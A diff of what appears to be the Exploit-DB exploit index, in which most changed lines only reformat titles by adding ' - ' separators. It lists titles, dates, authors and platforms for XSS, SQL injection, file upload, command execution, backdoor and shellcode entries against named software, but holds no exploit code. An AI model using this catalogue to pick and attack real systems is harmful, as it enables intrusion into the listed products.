- Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,linux,dos,0 37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting",2012-04-03,b.saleh,hardware,remote,0 @@ -33458,10 +33458,10 @@ id,file,description,date,author,platform,type,port 37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80 -37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injection",2015-05-21,"Filippo Roncari",php,webapps,80 37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 - SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 @@ -33491,7 +33491,7 @@ id,file,description,date,author,platform,type,port 37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 +37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 @@ -33511,7 +33511,7 @@ id,file,description,date,author,platform,type,port 37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0 -37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 +37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal - Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 - filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 @@ -33520,7 +33520,7 @@ id,file,description,date,author,platform,type,port 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 -37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 +37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 @@ -33536,8 +33536,8 @@ id,file,description,date,author,platform,type,port 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 - (SEH) BOF",2015-06-04,"Zahid Adeel",windows,local,0 -37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 -37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 +37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 +37170,platforms/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow",2015-06-01,Metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 - admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 @@ -33552,7 +33552,7 @@ id,file,description,date,author,platform,type,port 37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins 2.0 - Remote File Upload",2015-06-01,"nabil chris",php,webapps,0 37167,platforms/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 -37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 +37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0 37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37174,platforms/php/webapps/37174.txt,"WordPress Network Publisher 5.0.1 Plugin - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -33603,7 +33603,7 @@ id,file,description,date,author,platform,type,port 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 -37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 +37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader - Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 37227,platforms/php/webapps/37227.txt,"concrete5 - index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37228,platforms/php/webapps/37228.txt,"concrete5 - index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37229,platforms/php/webapps/37229.txt,"concrete5 - index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 @@ -33631,7 +33631,7 @@ id,file,description,date,author,platform,type,port 37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0 37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80 37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0 -37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 +37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0 37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 @@ -33839,7 +33839,7 @@ id,file,description,date,author,platform,type,port 37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat Plugin - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 -37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service",2012-07-06,IOactive,multiple,dos,0 +37487,platforms/multiple/dos/37487.txt,"Apache Sling - Denial Of Service",2012-07-06,IOactive,multiple,dos,0 37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0 @@ -33849,8 +33849,8 @@ id,file,description,date,author,platform,type,port 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 Plugin - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 -37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross-Site Scripting and SQL Injection",2012-06-17,snup,php,webapps,0 -37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 +37500,platforms/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,php,webapps,0 +37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection",2012-07-15,ToXiC,php,webapps,0 37503,platforms/php/webapps/37503.txt,"Event Calender PHP Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 @@ -33871,7 +33871,7 @@ id,file,description,date,author,platform,type,port 37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component - 'controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI Redirection and Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 -37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 +37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 @@ -33893,7 +33893,7 @@ id,file,description,date,author,platform,type,port 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 -37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 +37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0 37551,platforms/php/webapps/37551.txt,"phpBB - Multiple SQL Injection",2012-07-28,HauntIT,php,webapps,0 @@ -33904,7 +33904,7 @@ id,file,description,date,author,platform,type,port 37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager Multiple Cross-Site Scripting and SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0 -37559,platforms/php/webapps/37559.txt,"WordPress CP Image Store with Slideshow Plugin 1.0.5 Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 +37559,platforms/php/webapps/37559.txt,"WordPress CP Image Store with Slideshow Plugin 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37560,platforms/php/webapps/37560.txt,"WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 @@ -33936,8 +33936,8 @@ id,file,description,date,author,platform,type,port 37594,platforms/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection",2015-07-13,"ali ahmady",php,webapps,80 37595,platforms/php/webapps/37595.txt,"phpVibe - Aribtrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80 37596,platforms/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80 -37597,platforms/hardware/remote/37597.rb,"Accellion FTA getStatus verify_oauth_token Command Execution",2015-07-13,Metasploit,hardware,remote,443 -37598,platforms/multiple/remote/37598.rb,"VNC Keyboard Remote Code Execution",2015-07-13,Metasploit,multiple,remote,5900 +37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution",2015-07-13,Metasploit,hardware,remote,443 +37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution",2015-07-13,Metasploit,multiple,remote,5900 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free",2015-07-13,Metasploit,windows,remote,0 37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia Remote Code Execution",2015-07-13,Metasploit,multiple,remote,617 37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 @@ -33954,15 +33954,15 @@ id,file,description,date,author,platform,type,port 37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard index.php Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 -37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 -37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Inclusion and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 +37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter - Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 +37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Inclusion and - Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple RCE Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF / XSS",2015-07-16,"Pierre Kim",hardware,webapps,0 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0 -37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 +37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF",2015-07-17,"Tom Adams",php,webapps,80 37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injection / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0 37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 @@ -33987,8 +33987,8 @@ id,file,description,date,author,platform,type,port 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 37652,platforms/php/webapps/37652.txt,"KindEditor - 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 -37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 -37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 +37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 +37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 @@ -33998,7 +33998,7 @@ id,file,description,date,author,platform,type,port 37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS / Android / Win 3.1.3 - Persistent",2015-07-20,Vulnerability-Lab,multiple,webapps,0 37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 -37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 +37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 @@ -34013,7 +34013,7 @@ id,file,description,date,author,platform,type,port 37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 -37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 +37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos,0 @@ -34022,7 +34022,7 @@ id,file,description,date,author,platform,type,port 37689,platforms/asp/webapps/37689.txt,"XM Forum - 'search.asp' SQL Injection",2012-08-30,Crim3R,asp,webapps,0 37690,platforms/php/webapps/37690.txt,"Crowbar - 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 -37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 +37692,platforms/multiple/dos/37692.pl,"aMSN - Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Inclusion",2012-09-03,AkaStep,php,webapps,0 37694,platforms/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection",2012-09-04,AkaStep,php,webapps,0 @@ -34032,7 +34032,7 @@ id,file,description,date,author,platform,type,port 37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS / Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 -37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 +37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - .h3m Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0 37826,platforms/php/webapps/37826.txt,"WordPress 3.4.2 - Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 Plugin - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 @@ -34111,7 +34111,7 @@ id,file,description,date,author,platform,type,port 37779,platforms/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 